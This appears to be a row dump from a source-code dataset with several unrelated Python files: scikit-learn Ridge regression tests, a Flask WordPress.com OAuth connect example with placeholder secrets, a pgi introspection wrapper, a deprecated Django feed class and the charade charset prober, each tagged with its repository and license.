# with len(y.shape) == 2
n_responses = 3
y = rng.randn(n_samples, n_responses)
r.fit(x, y)
assert_equal(r.cv_values_.shape, (n_samples, n_responses, n_alphas))
def test_ridgecv_sample_weight():
rng = np.random.RandomState(0)
alphas = (0.1, 1.0, 10.0)
# There are different algorithms for n_samples > n_features
# and the opposite, so test them both.
for n_samples, n_features in ((6, 5), (5, 10)):
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
sample_weight = 1 + rng.rand(n_samples)
cv = KFold(n_samples, 5)
ridgecv = RidgeCV(alphas=alphas, cv=cv)
ridgecv.fit(X, y, sample_weight=sample_weight)
# Check using GridSearchCV directly
parameters = {'alpha': alphas}
fit_params = {'sample_weight': sample_weight}
gs = GridSearchCV(Ridge(), parameters, fit_params=fit_params,
cv=cv)
gs.fit(X, y)
assert_equal(ridgecv.alpha_, gs.best_estimator_.alpha)
assert_array_almost_equal(ridgecv.coef_, gs.best_estimator_.coef_)
def test_raises_value_error_if_sample_weights_greater_than_1d():
# Sample weights must be either scalar or 1D
n_sampless = [2, 3]
n_featuress = [3, 2]
rng = np.random.RandomState(42)
for n_samples, n_features in zip(n_sampless, n_featuress):
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
sample_weights_OK = rng.randn(n_samples) ** 2 + 1
sample_weights_OK_1 = 1.
sample_weights_OK_2 = 2.
sample_weights_not_OK = sample_weights_OK[:, np.newaxis]
sample_weights_not_OK_2 = sample_weights_OK[np.newaxis, :]
ridge = Ridge(alpha=1)
# make sure the "OK" sample weights actually work
ridge.fit(X, y, sample_weights_OK)
ridge.fit(X, y, sample_weights_OK_1)
ridge.fit(X, y, sample_weights_OK_2)
def fit_ridge_not_ok():
ridge.fit(X, y, sample_weights_not_OK)
def fit_ridge_not_ok_2():
ridge.fit(X, y, sample_weights_not_OK_2)
assert_raise_message(ValueError,
"Sample weights must be 1D array or scalar",
fit_ridge_not_ok)
assert_raise_message(ValueError,
"Sample weights must be 1D array or scalar",
fit_ridge_not_ok_2)
def test_sparse_design_with_sample_weights():
# Sample weights must work with sparse matrices
n_sampless = [2, 3]
n_featuress = [3, 2]
rng = np.random.RandomState(42)
sparse_matrix_converters = [sp.coo_matrix,
sp.csr_matrix,
sp.csc_matrix,
sp.lil_matrix,
sp.dok_matrix
]
sparse_ridge = Ridge(alpha=1., fit_intercept=False)
dense_ridge = Ridge(alpha=1., fit_intercept=False)
for n_samples, n_features in zip(n_sampless, n_featuress):
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
sample_weights = rng.randn(n_samples) ** 2 + 1
for sparse_converter in sparse_matrix_converters:
X_sparse = sparse_converter(X)
sparse_ridge.fit(X_sparse, y, sample_weight=sample_weights)
dense_ridge.fit(X, y, sample_weight=sample_weights)
assert_array_almost_equal(sparse_ridge.coef_, dense_ridge.coef_,
decimal=6)
def test_raises_value_error_if_solver_not_supported():
# Tests whether a ValueError is raised if a non-identified solver
# is passed to ridge_regression
wrong_solver = "This is not a solver (MagritteSolveCV QuantumBitcoin)"
exception = ValueError
message = "Solver %s not understood" % wrong_solver
def func():
X = np.eye(3)
y = np.ones(3)
ridge_regression(X, y, alpha=1., solver=wrong_solver)
assert_raise_message(exception, message, func)
def test_sparse_cg_max_iter():
reg = Ridge(solver="sparse_cg", max_iter=1)
reg.fit(X_diabetes, y_diabetes)
assert_equal(reg.coef_.shape[0], X_diabetes.shape[1])
| bsd-3-clause |
Automattic/wpcom-connect-examples | flask/run.py | 1 | 2318 | # Example WordPress.com Connect
from flask import Flask
app = Flask(__name__)
from flask import request
from flask import make_response
from flask import abort, redirect, url_for
import urllib
import md5
import random
import string
import requests
wpcc_consts = {
"client_id": 1234, #TODO
"client_secret": "Your WP.com secret", #TODO
"login_url": "http://localhost:5000/", #TODO
"redirect_url": "http://localhost:5000/connected", #TODO
"request_token_url": "https://public-api.wordpress.com/oauth2/token",
"authenticate_url": "https://public-api.wordpress.com/oauth2/authenticate"
}
@app.route("/")
def login():
state = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(30))
params = {
"response_type": "code",
"client_id": wpcc_consts['client_id'],
"state": state,
"redirect_uri": wpcc_consts['redirect_url']
}
wpcc_url = wpcc_consts['authenticate_url'] + '?' + urllib.urlencode(params)
resp = make_response(
'<html><body><h2>Connect to Trafalgar Square</h2><p>' + state + '</p><a href="' +
wpcc_url +
'"><img src="//s0.wp.com/i/wpcc-button.png" width="231" /></a></body></html>'
)
resp.set_cookie('wpcc_state', state)
return resp
@app.route("/connected")
def connected():
code = request.args.get( 'code' )
if not code:
return redirect(url_for('login'))
state = request.args.get( 'state' )
if not state:
return 'Warning! State variable missing after authentication'
wpcc_state = request.cookies.get( 'wpcc_state' )
if state != wpcc_state:
return 'Warning! State mismatch. Authentication attempt may have been compromised. ' + wpcc_state
payload = {
"client_id" : wpcc_consts['client_id'],
"redirect_uri" : wpcc_consts['redirect_url'],
"client_secret" : wpcc_consts['client_secret'],
"code" : code, #The code from the previous request
"grant_type" : 'authorization_code'
}
r = requests.post(wpcc_consts['request_token_url'], data=payload)
if 200 == r.status_code:
#TODO: in real app, store the returned token
return 'Connected to Trafalgar Square!'
return 'Error: ' + r.text
if __name__ == "__main__":
app.debug = True
app.run()
| unlicense |
jackkiej/SickRage | lib/pgi/cffilib/gir/gifunctioninfo.py | 19 | 2047 | # Copyright 2013 Christoph Reiter
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
from .. import _create_enum_class, glib
from .._utils import string_decode
from ._ffi import ffi, lib
from .gibaseinfo import GIBaseInfo, GIInfoType
from .gicallableinfo import GICallableInfo
from .gipropertyinfo import GIPropertyInfo
GIFunctionInfoFlags = _create_enum_class(ffi, "GIFunctionInfoFlags",
"GI_FUNCTION_", flags=True)
GInvokeError = _create_enum_class(ffi, "GInvokeError", "G_INVOKE_ERROR_")
@GIBaseInfo._register(GIInfoType.FUNCTION)
class GIFunctionInfo(GICallableInfo):
@property
def symbol(self):
res = lib.g_function_info_get_symbol(self._ptr)
return string_decode(ffi, res)
@property
def flags(self):
return GIFunctionInfoFlags(lib.g_function_info_get_flags(self._ptr))
def get_property(self):
res = lib.g_function_info_get_property(self._ptr)
if res:
return GIPropertyInfo(res)
def invoke(self, in_args, out_args, return_value):
if return_value is None:
return_value = ffi.NULL
else:
return_value = return_value._ptr
if in_args is None:
in_args = ffi.NULL
n_in_args = 0
else:
n_in_args = len(in_args)
in_args = ffi.new("GIArgument[]", [a._ptr[0] for a in in_args])
if out_args is None:
out_args = ffi.NULL
n_out_args = 0
else:
n_out_args = len(out_args)
out_args = ffi.new("GIArgument[]", [a._ptr[0] for a in out_args])
with glib.gerror() as error:
res = lib.g_function_info_invoke(
self._ptr, in_args, n_in_args, out_args, n_out_args,
return_value, error)
return bool(res)
| gpl-3.0 |
Kazade/NeHe-Website | google_appengine/lib/django_1_2/django/contrib/syndication/feeds.py | 65 | 1374 | from django.contrib.syndication import views
from django.core.exceptions import ObjectDoesNotExist
import warnings
# This is part of the deprecated API
from django.contrib.syndication.views import FeedDoesNotExist, add_domain
class Feed(views.Feed):
"""Provided for backwards compatibility."""
def __init__(self, slug, request):
warnings.warn('The syndication feeds.Feed class is deprecated. Please '
'use the new class based view API.',
category=PendingDeprecationWarning)
self.slug = slug
self.request = request
self.feed_url = getattr(self, 'feed_url', None) or request.path
self.title_template = self.title_template or ('feeds/%s_title.html' % slug)
self.description_template = self.description_template or ('feeds/%s_description.html' % slug)
def get_object(self, bits):
return None
def get_feed(self, url=None):
"""
Returns a feedgenerator.DefaultFeed object, fully populated, for
this feed. Raises FeedDoesNotExist for invalid parameters.
"""
if url:
bits = url.split('/')
else:
bits = []
try:
obj = self.get_object(bits)
except ObjectDoesNotExist:
raise FeedDoesNotExist
return super(Feed, self).get_feed(obj, self.request)
| bsd-3-clause |
patdoyle1/FastMath | lib/python2.7/site-packages/pip/_vendor/requests/packages/charade/sbcharsetprober.py | 2927 | 4793 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
SAMPLE_SIZE = 64
SB_ENOUGH_REL_THRESHOLD = 1024
POSITIVE_SHORTCUT_THRESHOLD = 0.95
NEGATIVE_SHORTCUT_THRESHOLD = 0.05
SYMBOL_CAT_ORDER = 250
NUMBER_OF_SEQ_CAT = 4
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1
#NEGATIVE_CAT = 0
class SingleByteCharSetProber(CharSetProber):
def __init__(self, model, reversed=False, nameProber=None):
CharSetProber.__init__(self)
self._mModel = model
# TRUE if we need to reverse every pair in the model lookup
self._mReversed = reversed
# Optional auxiliary prober for name decision
self._mNameProber = nameProber
self.reset()
def reset(self):
CharSetProber.reset(self)
# char order of last character
self._mLastOrder = 255
self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
self._mTotalSeqs = 0
self._mTotalChar = 0
# characters that fall in our sampling range
self._mFreqChar = 0
def get_charset_name(self):
if self._mNameProber:
return self._mNameProber.get_charset_name()
else:
return self._mModel['charsetName']
def feed(self, aBuf):
if not self._mModel['keepEnglishLetter']:
aBuf = self.filter_without_english_letters(aBuf)
aLen = len(aBuf)
if not aLen:
return self.get_state()
for c in aBuf:
order = self._mModel['charToOrderMap'][wrap_ord(c)]
if order < SYMBOL_CAT_ORDER:
self._mTotalChar += 1
if order < SAMPLE_SIZE:
self._mFreqChar += 1
if self._mLastOrder < SAMPLE_SIZE:
self._mTotalSeqs += 1
if not self._mReversed:
i = (self._mLastOrder * SAMPLE_SIZE) + order
model = self._mModel['precedenceMatrix'][i]
else: # reverse the order of the letters in the lookup
i = (order * SAMPLE_SIZE) + self._mLastOrder
model = self._mModel['precedenceMatrix'][i]
self._mSeqCounters[model] += 1
self._mLastOrder = order
if self.get_state() == constants.eDetecting:
if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD:
cf = self.get_confidence()
if cf > POSITIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, we have a'
'winner\n' %
(self._mModel['charsetName'], cf))
self._mState = constants.eFoundIt
elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, below negative'
'shortcut threshhold %s\n' %
(self._mModel['charsetName'], cf,
NEGATIVE_SHORTCUT_THRESHOLD))
self._mState = constants.eNotMe
return self.get_state()
def get_confidence(self):
r = 0.01
if self._mTotalSeqs > 0:
r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
/ self._mModel['mTypicalPositiveRatio'])
r = r * self._mFreqChar / self._mTotalChar
if r >= 1.0:
r = 0.99
return r
| gpl-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.